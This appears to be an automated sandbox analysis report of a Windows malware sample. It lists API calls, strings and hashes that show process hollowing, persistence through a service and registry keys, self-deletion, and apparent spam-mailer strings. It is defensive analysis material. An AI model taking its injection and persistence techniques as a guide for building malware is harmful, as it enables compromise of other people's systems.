                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2777991786-1857712256
                                                                                        • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                        • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                        • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                        • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                        APIs
                                                                                        • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
                                                                                        • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: IncrementInterlockedlstrcpyn
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 224340156-2903620461
                                                                                        • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                        • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                        • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                        • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                        APIs
                                                                                        • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                        • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbyaddrinet_ntoa
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2112563974-1857712256
                                                                                        • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                        • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                        • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                        • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbynameinet_addr
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 1594361348-2401304539
                                                                                        • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                        • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,7508EA50,80000001,00000000), ref: 0040EAF2
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0040EB07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: ntdll.dll
                                                                                        • API String ID: 2574300362-2227199552
                                                                                        • Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                        • Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
                                                                                        • Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                        • Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
                                                                                        APIs
                                                                                          • Part of subcall function 02612F88: GetModuleHandleA.KERNEL32(?), ref: 02612FA1
                                                                                          • Part of subcall function 02612F88: LoadLibraryA.KERNEL32(?), ref: 02612FB1
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026131DA
                                                                                        • HeapFree.KERNEL32(00000000), ref: 026131E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1017166417-0
                                                                                        • Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                        • Instruction ID: 748d1f5a32de7caa2923327edfa77ad575e5d8efb0e77a5819cdfd431022425a
                                                                                        • Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                        • Instruction Fuzzy Hash: E5519D7190028AAFCB059F64D884AEAB775FF05305F1841A9EC96C7310E732EA69CB94
                                                                                        APIs
                                                                                          • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                          • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00402F7A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1017166417-0
                                                                                        • Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                        • Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
                                                                                        • Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                        • Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 00409A83
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00406511), ref: 00409A8A
                                                                                          • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                          • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                          • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
                                                                                        • GetCommandLineA.KERNEL32 ref: 00409AFD
                                                                                        • lstrlenA.KERNEL32(?), ref: 00409B99
                                                                                        • ExitProcess.KERNEL32 ref: 00409C06
                                                                                        • GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00409D8B
                                                                                        • lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
                                                                                        • DeleteFileA.KERNEL32(00000022), ref: 00409E38
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
                                                                                        • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
                                                                                        • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
                                                                                        • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
                                                                                        • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
                                                                                        • lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
                                                                                        • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
                                                                                        • wsprintfA.USER32 ref: 0040A0B6
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
                                                                                        • lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
                                                                                        • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
                                                                                        • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
                                                                                        • GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
                                                                                        • GetCommandLineA.KERNEL32 ref: 0040A1E5
                                                                                          • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,004122F8,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                          • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                          • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                        • lstrlenA.KERNEL32(?), ref: 0040A288
                                                                                        • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                        • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                        • DeleteFileA.KERNEL32(C:\Users\user\Desktop\874A7cigvX.exe), ref: 0040A407
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040405E,00000000,00000000,00000000), ref: 0040A42C
                                                                                        • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040877E,00000000,00000000,00000000), ref: 0040A469
                                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                        • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                        • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                        • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                        • String ID: "$"$"$%X%08X$C:\Users\user\Desktop\874A7cigvX.exe$C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$D$P$\$ycgeofkw
                                                                                        • API String ID: 2089075347-1962795566
                                                                                        • Opcode ID: 69071e7f72711d21cff6056459b1329949a0fa875525a2a87badba31d3a6a59d
                                                                                        • Instruction ID: 9e8e6158c267d4507ba39c142606b205eb09e8ef63bc9ae6e883bbf27c052806
                                                                                        • Opcode Fuzzy Hash: 69071e7f72711d21cff6056459b1329949a0fa875525a2a87badba31d3a6a59d
                                                                                        • Instruction Fuzzy Hash: 4A5291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
                                                                                        • VirtualAllocEx.KERNELBASE(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 004063EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1965334864-0
                                                                                        • Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                        • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                        • Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                        • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,75920F10,00000000), ref: 00407472
                                                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,75920F10,00000000), ref: 004074F0
                                                                                        • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,75920F10,00000000), ref: 00407528
                                                                                        • ___ascii_stricmp.LIBCMT ref: 0040764D
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,75920F10,00000000), ref: 004076E7
                                                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 00407717
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,75920F10,00000000), ref: 00407745
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 004077EF
                                                                                          • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
                                                                                        • RegCloseKey.KERNELBASE(?), ref: 004077E6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                        • String ID: "
                                                                                        • API String ID: 3433985886-123907689
                                                                                        • Opcode ID: 58688efdc745e23d79e1c9d42d0b110b33b2b67bc428880df89735915a056cb6
                                                                                        • Instruction ID: 2be8177c38fcb0431c37abdcb30432b02610efeff0693f38a05b2573c300e2d4
                                                                                        • Opcode Fuzzy Hash: 58688efdc745e23d79e1c9d42d0b110b33b2b67bc428880df89735915a056cb6
                                                                                        • Instruction Fuzzy Hash: E8C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1004B7F504B72D1EA79AE908B69
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D7024D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: cess$kernel32.dll
                                                                                        • API String ID: 4275171209-1230238691
                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction ID: 812c7047b637651cfe57936d190c6aea0a11fb53c0fbb91790050cd524f7a457
                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction Fuzzy Hash: B4525975A012299FDB64CF58C984BACBBB1BF09305F1480D9E54DAB391EB34AE85CF14
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,004122F8), ref: 004097B1
                                                                                        • Wow64GetThreadContext.KERNEL32(?,?,?,?,?,?,?,004122F8), ref: 004097EB
                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 004097F9
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 00409831
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040984E
                                                                                        • ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040985B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessThread$ContextWow64$CreateMemoryResumeTerminateWrite
                                                                                        • String ID: D
                                                                                        • API String ID: 2098669666-2746444292
                                                                                        • Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                        • Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
                                                                                        • Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                        • Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                        • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                        • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CreateEvent
                                                                                        • String ID:
                                                                                        • API String ID: 1371578007-0
                                                                                        • Opcode ID: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                        • Instruction ID: 580dd723e2696739ab8c529274da47b2bc3b4765397f1bbb4cd5042057411b76
                                                                                        • Opcode Fuzzy Hash: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                        • Instruction Fuzzy Hash: F94181B1900209BADB109BA2CD45F9FBFBCEF40355F104566F614B21C1D7789A51DBA4
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,004122F8,004042B6,00000000,00000001,004122F8,00000000,?,004098FD), ref: 00404021
                                                                                        • GetLastError.KERNEL32(?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 0040402C
                                                                                        • Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404046
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 408151869-0
                                                                                        • Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                        • Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
                                                                                        • Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                        • Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                        • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$CountFileInformationSystemTickVolume
                                                                                        • String ID:
                                                                                        • API String ID: 1209300637-0
                                                                                        • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                        • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                        • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                        • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(?,00401FA1), ref: 00406E55
                                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,00000000,00000012), ref: 00406E8D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountLookupUser
                                                                                        • String ID:
                                                                                        • API String ID: 2370142434-0
                                                                                        • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction ID: d69833bf2c7126fc9b7bd4b1d5117f4fe90a033eeaed535c4400ab00b2689cfd
                                                                                        • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction Fuzzy Hash: 0211F776900218EBDF21CFD4C884ADFB7BCAB04741F1542B6E502F6290DB749B989BE4
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 026324B6
                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 026324D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086252389.0000000002622000.00000040.00000020.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3833638111-0
                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction ID: 731b4e5af83ce6969af08a6139476cb71a40ba79aa53bcc4f5645b5c3b02c290
                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction Fuzzy Hash: 2FF096316007107BE7213BF9EC9DB6E76E8AF49738F100529FA46915C1DB74EC454AA1
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02D70223,?,?), ref: 02D70E19
                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02D70223,?,?), ref: 02D70E1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction ID: 1e332a13354e2b6ba836fca803a86de0039a6c13a583d90132fd488c4997e204
                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction Fuzzy Hash: E4D0123114512877D7002A94DC09BCD7B1CDF09B67F008011FB0DD9180C774994046E5
                                                                                        APIs
                                                                                          • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                          • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                          • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
                                                                                          • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                        • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1823874839-0
                                                                                        • Opcode ID: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                        • Instruction ID: 937aca74520052d45988c2d0c0f169875d4d0bc257a2eacc80ff7e120b8985ce
                                                                                        • Opcode Fuzzy Hash: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                        • Instruction Fuzzy Hash: 75F0C2B6104218AFD710DB64EDC4EE777EED714308F1084B6E286E3145D6B89DA85B6C
                                                                                        APIs
                                                                                        • SetServiceStatus.SECHOST(00413394), ref: 004098EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ServiceStatus
                                                                                        • String ID:
                                                                                        • API String ID: 3969395364-0
                                                                                        • Opcode ID: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                        • Instruction ID: dd676a4af3dd8f9e000b524091363a81fd6157f1888c947a943bd607f736cbf1
                                                                                        • Opcode Fuzzy Hash: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
